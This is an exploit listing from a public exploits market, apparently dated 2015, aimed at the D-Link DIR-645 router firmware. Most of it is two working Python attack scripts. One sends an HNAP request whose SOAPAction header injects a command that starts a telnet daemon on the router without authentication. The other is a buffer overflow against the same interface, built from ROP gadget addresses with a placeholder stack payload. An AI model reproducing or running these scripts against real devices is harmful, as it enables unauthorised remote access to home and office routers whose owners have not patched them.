[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

D-link DIR-645 Command Injection - Buffer Overflow Exploit

Author
DNO
Risk
[
Security Risk High
]
0day-ID
0day-ID-23924
Category
web applications
Date add
23-07-2015
Platform
hardware
# Exploit Title: DIR-645 D-link Command Injection - Buffer Overflow
# Type: Command Injection - Buffer Overflow
# Date: 22/07/2015
# Exploit Author: DNO
# Version: DIR-645 FW 1.04b12
# Tested on: linux "ubuntu"
# CVE :  N/A

========================================

about DIR-645
*****************************************

The DIR-645 Wired/Wireless Router contains a flaw that allows a malicious user to cause an overflow (halt in executing application)
in the device software that  could allows access to it's operating system and allows unauthenticated commands to be executied.
An additional flaw has been found that allows command injection through it's HNAP interface.
===============

description:
==========
Using firmware in an emulator to determine exploits, the author designed exploit scripts written in python that give details.

"The buffer overflow does not have a payload at this time, however if you watch the exploit in a debugger, then it can be clearly seen that the payload uses ROP techniques to get
 to stack payload which is a bunch of C's for now on the stack. It can be replaced with any payload that works on MIPS little endian architecture."
====================

exploit:
==========
*********************************

• Command injection

*********************************

import socket
import struct
 
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + 'test;telnetd -p 9656;test\r\n' + "1\r\n\r\n"
 
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)

********************************************

•Buffer overflow

********************************************
import socket
import struct
 
exploit_buffer = "POST /HNAP1/ HTTP/1.0\r\nHOST: 10.0.0.1\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ";pt;"+"B"*158
exploit_buffer+="C"*50+"Z"*46
 
 
exploit_buffer+="\xb4\x67\xb3\x2a"
 
exploit_buffer+="\xd0\xeb\xb4\x2a"
exploit_buffer+="VVVV"
 
exploit_buffer+="\x7c\xba\xb1\x2a"
exploit_buffer+="K"*16
 
exploit_buffer+="\x44\x3b\xb0\x2A"
exploit_buffer+="A"*36
 
exploit_buffer+="\xf0\x5e\xb0\x2A" 
exploit_buffer+="H"*16
 
exploit_buffer+="C"*212+"\r\n" + "1\r\n\r\n"
 
print "[+] sending exploit_bufferfer size", len(exploit_buffer)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.1", 80))
s.send(exploit_buffer)
===================================
 contact me FB : FB.COM/haker.dyno
 Copyright © 2015 /DNO

#  0day.today [2024-10-07]  #